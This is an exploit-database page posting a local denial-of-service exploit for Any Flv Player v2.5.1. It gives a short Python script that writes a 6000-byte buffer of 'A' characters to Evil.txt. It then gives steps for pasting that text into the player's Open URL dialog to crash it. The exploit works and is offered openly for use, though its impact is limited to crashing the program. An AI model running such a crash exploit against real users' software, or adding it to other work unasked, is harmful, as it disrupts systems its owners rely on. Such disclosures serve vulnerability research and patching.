Any Flv Player v2.5.1 Denial of Service Exploit

2020.05.11

Achilles (SC)

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Any Flv Player v2.5.1 Denial of Service Exploit
# Date: 10.05.2020
# Vendor Homepage:http://www.socusoft.com
# Software Link:  http://www.socusoft.com/down/any-flv-player.exe
# Exploit Author: Achilles
# Tested Version: v2.5.1
# Tested on: Windows 7 x64


# 1.- Run python code :Any_Flv_Player.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Any Flv Player.exe
# 4.- Select File, Open URL...
# 5.- Paste contents from clipboard 'Please enter the URL of the video file'
# 6.- Select OK and you will see a crash

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Any Flv Player v2.5.1 Denial of Service Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.